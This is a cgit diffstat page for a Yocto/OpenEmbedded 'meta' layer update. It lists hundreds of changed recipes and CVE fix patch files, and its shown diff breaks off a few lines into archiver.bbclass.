aboutsummaryrefslogtreecommitdiffstats
path: root/meta
diff options
context:
space:
mode:
Diffstat (limited to 'meta')
-rw-r--r--meta/classes/archiver.bbclass8
-rw-r--r--meta/classes/cross-canadian.bbclass2
-rw-r--r--meta/classes/cve-check.bbclass19
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/externalsrc.bbclass9
-rw-r--r--meta/classes/image_types.bbclass2
-rw-r--r--meta/classes/kernel-yocto.bbclass30
-rw-r--r--meta/classes/license.bbclass2
-rw-r--r--meta/classes/mirrors.bbclass2
-rw-r--r--meta/classes/multilib.bbclass1
-rw-r--r--meta/classes/package.bbclass6
-rw-r--r--meta/classes/package_ipk.bbclass4
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass3
-rw-r--r--meta/classes/reproducible_build.bbclass11
-rw-r--r--meta/classes/rm_work.bbclass8
-rw-r--r--meta/classes/sstate.bbclass27
-rw-r--r--meta/classes/terminal.bbclass5
-rw-r--r--meta/classes/testimage.bbclass7
-rw-r--r--meta/classes/uninative.bbclass2
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/conf/bitbake.conf6
-rw-r--r--meta/conf/distro/include/default-distrovars.inc2
-rw-r--r--meta/conf/distro/include/maintainers.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc10
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/toolchain-shar-extract.sh3
-rw-r--r--meta/files/toolchain-shar-relocate.sh4
-rw-r--r--meta/lib/oe/utils.py3
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py9
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py4
-rw-r--r--meta/lib/oeqa/runtime/cases/ptest.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/fetch.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py2
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py2
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb2
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.9.bb2
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc2
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.8.bb1
-rw-r--r--meta/recipes-connectivity/avahi/files/local-ping.patch153
-rw-r--r--meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-1.patch76
-rw-r--r--meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-2.patch65
-rw-r--r--meta/recipes-connectivity/bind/bind_9.16.16.bb6
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc2
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch100
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/0001-shared-gatt-server-Fix-not-properly-checking-for-sec.patch113
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_2.0.bb1
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb2
-rw-r--r--meta/recipes-connectivity/libuv/libuv_1.41.0.bb2
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb2
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch49
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.5p1.bb1
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1l.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1k.bb)2
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb2
-rw-r--r--meta/recipes-core/expat/expat_2.2.10.bb6
-rw-r--r--meta/recipes-core/fts/fts_1.2.7.bb2
-rw-r--r--meta/recipes-core/glibc/cross-localedef-native_2.33.bb2
-rw-r--r--meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--meta/recipes-core/glibc/glibc/0001-nptl-Remove-private-futex-optimization-BZ-27304.patch49
-rw-r--r--meta/recipes-core/glibc/glibc/0031-x86-Require-full-ISA-support-for-x86-64-level-marker.patch116
-rw-r--r--meta/recipes-core/glibc/glibc/0032-string-Work-around-GCC-PR-98512-in-rawmemchr.patch58
-rw-r--r--meta/recipes-core/glibc/glibc/0033-x86-Handle-_SC_LEVEL1_ICACHE_LINESIZE-BZ-27444.patch185
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-27318-revert.patch174
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-27645.patch51
-rw-r--r--meta/recipes-core/glibc/glibc_2.33.bb5
-rw-r--r--meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch2
-rw-r--r--meta/recipes-core/ifupdown/ifupdown_0.8.36.bb2
-rw-r--r--meta/recipes-core/images/build-appliance-image_15.0.0.bb2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/setup-live2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework_1.0.bb2
-rw-r--r--meta/recipes-core/initscripts/init-system-helpers_1.60.bb2
-rw-r--r--meta/recipes-core/initscripts/initscripts_1.0.bb3
-rw-r--r--meta/recipes-core/libxcrypt/libxcrypt.inc2
-rw-r--r--meta/recipes-core/libxml/libxml2_2.9.10.bb2
-rw-r--r--meta/recipes-core/musl/libucontext_git.bb2
-rw-r--r--meta/recipes-core/musl/musl-obstack.bb2
-rw-r--r--meta/recipes-core/musl/musl-utils.bb2
-rw-r--r--meta/recipes-core/musl/musl_git.bb2
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2021-39537.patch65
-rw-r--r--meta/recipes-core/ncurses/ncurses.inc2
-rw-r--r--meta/recipes-core/ncurses/ncurses_6.2.bb1
-rw-r--r--meta/recipes-core/netbase/netbase_6.2.bb5
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch51
-rw-r--r--meta/recipes-core/ovmf/ovmf_git.bb1
-rw-r--r--meta/recipes-core/psplash/psplash_git.bb2
-rw-r--r--meta/recipes-core/systemd/systemd.inc2
-rw-r--r--meta/recipes-core/systemd/systemd/0001-basic-unit-name-do-not-use-strdupa-on-a-path.patch72
-rw-r--r--meta/recipes-core/systemd/systemd/0001-sd-dhcp-client-check-error-earlier-and-reduce-indent.patch172
-rw-r--r--meta/recipes-core/systemd/systemd/0002-sd-dhcp-client-shorten-code-a-bit.patch66
-rw-r--r--meta/recipes-core/systemd/systemd/0003-sd-dhcp-client-logs-when-dhcp-client-unexpectedly-ga.patch69
-rw-r--r--meta/recipes-core/systemd/systemd/0004-sd-dhcp-client-tentatively-ignore-FORCERENEW-command.patch42
-rw-r--r--meta/recipes-core/systemd/systemd_247.6.bb5
-rw-r--r--meta/recipes-core/update-rc.d/update-rc.d_0.8.bb4
-rw-r--r--meta/recipes-core/util-linux/util-linux.inc1
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch38
-rw-r--r--meta/recipes-core/util-linux/util-linux_2.36.2.bb2
-rw-r--r--meta/recipes-devtools/binutils/binutils-2.36.inc2
-rw-r--r--meta/recipes-devtools/binutils/binutils/0017-CVE-2021-3530.patch102
-rw-r--r--meta/recipes-devtools/binutils/binutils/0018-CVE-2021-3530.patch64
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb8
-rw-r--r--meta/recipes-devtools/btrfs-tools/btrfs-tools_5.10.1.bb2
-rw-r--r--meta/recipes-devtools/createrepo-c/createrepo-c_0.17.0.bb6
-rw-r--r--meta/recipes-devtools/distcc/distcc_3.3.5.bb2
-rw-r--r--meta/recipes-devtools/dnf/dnf_4.6.0.bb2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs.inc2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch22
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs_1.46.1.bb1
-rw-r--r--meta/recipes-devtools/file/file_5.39.bb5
-rw-r--r--meta/recipes-devtools/file/files/0001-Fix-close_on_exec-multithreaded-decompression-issue.patch220
-rw-r--r--meta/recipes-devtools/flex/flex_2.6.4.bb5
-rw-r--r--meta/recipes-devtools/gcc/gcc-10.2.inc4
-rw-r--r--meta/recipes-devtools/gcc/gcc/0001-CVE-2021-35465.patch138
-rw-r--r--meta/recipes-devtools/gcc/gcc/0002-CVE-2021-35465.patch40
-rw-r--r--meta/recipes-devtools/gcc/gcc/0003-CVE-2021-35465.patch103
-rw-r--r--meta/recipes-devtools/gcc/gcc/0004-CVE-2021-35465.patch304
-rw-r--r--meta/recipes-devtools/glide/glide_0.13.3.bb2
-rw-r--r--meta/recipes-devtools/gnu-config/gnu-config_git.bb2
-rw-r--r--meta/recipes-devtools/go/go-1.16.8.inc (renamed from meta/recipes-devtools/go/go-1.16.5.inc)10
-rw-r--r--meta/recipes-devtools/go/go-1.16/0001-encoding-xml-handle-leading-trailing-or-double-colon.patch123
-rw-r--r--meta/recipes-devtools/go/go-binary-native_1.16.8.bb (renamed from meta/recipes-devtools/go/go-binary-native_1.16.5.bb)4
-rw-r--r--meta/recipes-devtools/go/go-cross-canadian_1.16.8.bb (renamed from meta/recipes-devtools/go/go-cross-canadian_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/go/go-cross_1.16.8.bb (renamed from meta/recipes-devtools/go/go-cross_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/go/go-crosssdk_1.16.8.bb (renamed from meta/recipes-devtools/go/go-crosssdk_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/go/go-native_1.16.8.bb (renamed from meta/recipes-devtools/go/go-native_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/go/go-runtime_1.16.8.bb (renamed from meta/recipes-devtools/go/go-runtime_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/go/go_1.16.8.bb (renamed from meta/recipes-devtools/go/go_1.16.5.bb)0
-rw-r--r--meta/recipes-devtools/libcomps/libcomps_0.1.15.bb2
-rw-r--r--meta/recipes-devtools/libdnf/libdnf_0.58.0.bb2
-rw-r--r--meta/recipes-devtools/librepo/librepo_1.13.0.bb2
-rw-r--r--meta/recipes-devtools/llvm/llvm_git.bb6
-rw-r--r--meta/recipes-devtools/m4/m4-1.4.18.inc1
-rw-r--r--meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch84
-rw-r--r--meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch431
-rw-r--r--meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb1
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils_git.bb2
-rw-r--r--meta/recipes-devtools/ninja/ninja_1.10.2.bb2
-rw-r--r--meta/recipes-devtools/patchelf/patchelf_0.12.bb2
-rwxr-xr-xmeta/recipes-devtools/pseudo/files/build-oldlibc20
-rw-r--r--meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch57
-rw-r--r--meta/recipes-devtools/pseudo/pseudo.inc13
-rw-r--r--meta/recipes-devtools/pseudo/pseudo_git.bb9
-rw-r--r--meta/recipes-devtools/python/python3-pip/0001-Don-t-split-git-references-on-unicode-separators.patch40
-rw-r--r--meta/recipes-devtools/python/python3-pip_20.0.2.bb4
-rw-r--r--meta/recipes-devtools/python/python3/makerace.patch23
-rw-r--r--meta/recipes-devtools/python/python3_3.9.5.bb1
-rw-r--r--meta/recipes-devtools/qemu/qemu.inc13
-rw-r--r--meta/recipes-devtools/qemu/qemu/0001-vhost-user-gpu-fix-memory-disclosure-in-virgl_cmd_ge.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/0002-vhost-user-gpu-fix-resource-leak-in-vg_resource_crea.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/0003-vhost-user-gpu-fix-memory-leak-in-vg_resource_attach.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/0004-vhost-user-gpu-fix-memory-leak-while-calling-vg_reso.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/0005-vhost-user-gpu-fix-memory-leak-in-virgl_cmd_resource.patch58
-rw-r--r--meta/recipes-devtools/qemu/qemu/0006-vhost-user-gpu-fix-memory-leak-in-virgl_resource_att.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/0007-vhost-user-gpu-fix-OOB-write-in-virgl_cmd_get_capset.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch59
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch41
-rw-r--r--meta/recipes-devtools/rpm/files/0001-CVE-2021-3521.patch57
-rw-r--r--meta/recipes-devtools/rpm/files/0001-build-pack.c-do-not-insert-payloadflags-into-.rpm-me.patch28
-rw-r--r--meta/recipes-devtools/rpm/files/0002-CVE-2021-3521.patch62
-rw-r--r--meta/recipes-devtools/rpm/files/0003-CVE-2021-3521.patch332
-rw-r--r--meta/recipes-devtools/rpm/rpm_4.16.1.3.bb9
-rw-r--r--meta/recipes-devtools/ruby/ruby/0003-rdoc-build-reproducible-documentation.patch35
-rw-r--r--meta/recipes-devtools/ruby/ruby/0004-lib-mkmf.rb-sort-list-of-object-files-in-generated-M.patch28
-rw-r--r--meta/recipes-devtools/ruby/ruby/0005-Mark-Gemspec-reproducible-change-fixing-784225-too.patch28
-rw-r--r--meta/recipes-devtools/ruby/ruby/0006-Make-gemspecs-reproducible.patch67
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-31799.patch57
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-31810.patch258
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-32066.patch102
-rw-r--r--meta/recipes-devtools/ruby/ruby_3.0.1.bb7
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch253
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-1.patch135
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-2.patch109
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-3.patch330
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072.patch316
-rw-r--r--meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb7
-rwxr-xr-xmeta/recipes-devtools/strace/strace/run-ptest9
-rw-r--r--meta/recipes-devtools/systemd-bootchart/systemd-bootchart_234.bb2
-rw-r--r--meta/recipes-devtools/tcf-agent/tcf-agent_git.bb2
-rw-r--r--meta/recipes-devtools/tcltk/tcl_8.6.11.bb3
-rw-r--r--meta/recipes-devtools/unfs3/unfs3_git.bb2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-all1
-rw-r--r--meta/recipes-extended/bash/bash.inc5
-rw-r--r--meta/recipes-extended/bzip2/bzip2/Makefile.am2
-rw-r--r--meta/recipes-extended/bzip2/bzip2_1.0.8.bb2
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch581
-rw-r--r--meta/recipes-extended/cpio/cpio_2.13.bb1
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch238
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb1
-rw-r--r--meta/recipes-extended/go-examples/go-helloworld_0.1.bb2
-rw-r--r--meta/recipes-extended/iputils/iputils_s20200821.bb2
-rw-r--r--meta/recipes-extended/libaio/libaio_0.3.112.bb2
-rw-r--r--meta/recipes-extended/libnsl/libnsl2_git.bb2
-rw-r--r--meta/recipes-extended/libnss-nis/libnss-nis.bb2
-rw-r--r--meta/recipes-extended/libsolv/libsolv_0.7.17.bb2
-rw-r--r--meta/recipes-extended/ltp/ltp_20210121.bb2
-rw-r--r--meta/recipes-extended/mc/files/CVE-2021-36370.patch609
-rw-r--r--meta/recipes-extended/mc/mc_4.8.26.bb1
-rw-r--r--meta/recipes-extended/net-tools/net-tools_2.10.bb2
-rw-r--r--meta/recipes-extended/newt/libnewt_0.52.21.bb2
-rw-r--r--meta/recipes-extended/parted/files/check-vfat.patch51
-rw-r--r--meta/recipes-extended/parted/files/run-ptest2
-rw-r--r--meta/recipes-extended/parted/parted_3.4.bb10
-rw-r--r--meta/recipes-extended/procps/procps_3.3.17.bb2
-rw-r--r--meta/recipes-extended/psmisc/psmisc_23.4.bb2
-rw-r--r--meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb2
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch32
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb2
-rw-r--r--meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb2
-rw-r--r--meta/recipes-extended/tar/tar_1.34.bb4
-rw-r--r--meta/recipes-extended/timezone/timezone.inc7
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb1
-rw-r--r--meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb2
-rw-r--r--meta/recipes-extended/zstd/zstd_1.4.9.bb4
-rw-r--r--meta/recipes-gnome/gobject-introspection/gobject-introspection_1.66.1.bb4
-rw-r--r--meta/recipes-gnome/hicolor-icon-theme/hicolor-icon-theme_0.17.bb4
-rw-r--r--meta/recipes-gnome/libhandy/libhandy_1.2.0.bb2
-rw-r--r--meta/recipes-gnome/libportal/libportal_0.3.bb2
-rw-r--r--meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch56
-rw-r--r--meta/recipes-graphics/glew/glew/notempdir.patch19
-rw-r--r--meta/recipes-graphics/glew/glew_2.2.0.bb2
-rw-r--r--meta/recipes-graphics/glslang/glslang_11.2.0.bb2
-rw-r--r--meta/recipes-graphics/igt-gpu-tools/igt-gpu-tools_git.bb2
-rw-r--r--meta/recipes-graphics/libfakekey/libfakekey_git.bb2
-rw-r--r--meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb2
-rw-r--r--meta/recipes-graphics/libva/libva-utils_2.10.0.bb2
-rw-r--r--meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb2
-rw-r--r--meta/recipes-graphics/mesa/files/0001-gallium-dri-Make-YUV-formats-we-re-going-to-emulate-.patch52
-rw-r--r--meta/recipes-graphics/mesa/mesa.inc3
-rw-r--r--meta/recipes-graphics/mx/mx-1.0_1.4.7.bb2
-rw-r--r--meta/recipes-graphics/piglit/piglit_git.bb2
-rw-r--r--meta/recipes-graphics/spir/spirv-headers_1.5.4.bb2
-rw-r--r--meta/recipes-graphics/spir/spirv-tools_2020.7.bb2
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb2
-rw-r--r--meta/recipes-graphics/vulkan/assimp_5.0.1.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-headers_1.2.170.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-loader_1.2.170.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-samples_git.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-tools_1.2.170.0.bb2
-rw-r--r--meta/recipes-graphics/waffle/waffle_1.6.1.bb10
-rw-r--r--meta/recipes-graphics/wayland/wayland-protocols_1.20.bb4
-rw-r--r--meta/recipes-graphics/wayland/weston/0001-libweston-backend-drm-Re-order-gbm-destruction-at-DR.patch50
-rw-r--r--meta/recipes-graphics/wayland/weston_9.0.0.bb1
-rw-r--r--meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-font/encodings_1.0.5.bb4
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman_0.40.0.bb2
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/0001-hw-xwayland-Makefile.am-fix-build-without-glx.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.10.bb1
-rw-r--r--meta/recipes-kernel/blktrace/blktrace_git.bb2
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev.inc2
-rw-r--r--meta/recipes-kernel/dtc/dtc.inc2
-rw-r--r--meta/recipes-kernel/kern-tools/kern-tools-native_git.bb2
-rw-r--r--meta/recipes-kernel/kmod/kmod.inc2
-rw-r--r--meta/recipes-kernel/kmod/kmod_git.bb8
-rw-r--r--meta/recipes-kernel/linux-firmware/linux-firmware_20211027.bb (renamed from meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb)23
-rw-r--r--meta/recipes-kernel/linux/kernel-devsrc.bb10
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto.inc1
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.10.bb24
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.4.bb22
-rw-r--r--meta/recipes-kernel/powertop/powertop_2.13.bb2
-rw-r--r--meta/recipes-kernel/systemtap/systemtap/ef5a8b9eda402e4e96c4e3ce01e7ff95d3e10470.patch26
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.inc3
-rw-r--r--meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb (renamed from meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb)6
-rw-r--r--meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.4.bb4
-rw-r--r--meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.4.bb4
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2020-20446.patch35
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2020-20453.patch42
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2020-22015.patch44
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2020-22021.patch87
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2020-22033-CVE-2020-22019.patch39
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2021-38114.patch67
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2021-38171.patch40
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/fix-CVE-2021-38291.patch54
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg_4.3.2.bb8
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb1
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb2
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb2
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/pulseaudio-sato/pulseaudio-client-conf-sato_1.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/shutdown-desktop/shutdown-desktop.bb5
-rw-r--r--meta/recipes-support/apr/apr/CVE-2021-35940.patch58
-rw-r--r--meta/recipes-support/apr/apr_1.7.0.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb4
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.6.bb2
-rw-r--r--meta/recipes-support/boost/boost-build-native_4.3.0.bb2
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch26
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch33
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20210119.bb)7
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22901.patch453
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch298
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch50
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22926.patch79
-rw-r--r--meta/recipes-support/curl/curl_7.75.0.bb4
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.2.bb2
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb2
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb1
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.7.2.bb (renamed from meta/recipes-support/gnutls/gnutls_3.7.1.bb)6
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.15.1.bb3
-rw-r--r--meta/recipes-support/icu/icu/0001-pkgdata-increase-command-buffer-size.patch46
-rw-r--r--meta/recipes-support/icu/icu_68.2.bb1
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.6.0.bb4
-rw-r--r--meta/recipes-support/libgit2/libgit2_1.1.0.bb2
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_3.0.1.bb2
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.3.bb3
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb2
-rw-r--r--meta/recipes-support/nettle/nettle_3.7.3.bb (renamed from meta/recipes-support/nettle/nettle_3.7.2.bb)2
-rw-r--r--meta/recipes-support/numactl/numactl_git.bb2
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb2
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.2.bb (renamed from meta/recipes-support/ptest-runner/ptest-runner_2.4.1.bb)4
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.11.bb2
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb2
-rw-r--r--meta/recipes-support/sqlite/sqlite3/CVE-2021-36690.patch62
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.35.0.bb4
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3778.patch34
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3796.patch50
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3872.patch57
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3875.patch37
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3903.patch38
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3927.patch32
-rw-r--r--meta/recipes-support/vim/files/CVE-2021-3928.patch34
-rw-r--r--meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch207
-rw-r--r--meta/recipes-support/vim/vim.inc15
-rw-r--r--meta/recipes-support/xxhash/xxhash_0.8.0.bb2
358 files changed, 10530 insertions, 870 deletions
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index a3962306b11..dd31dc0cd8b 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -281,7 +281,10 @@ python do_ar_configured() {
# ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
# do_configure, we archive the already configured ${S} to
# instead of.
- elif pn != 'libtool-native':
+ # The kernel class functions require it to be on work-shared, we
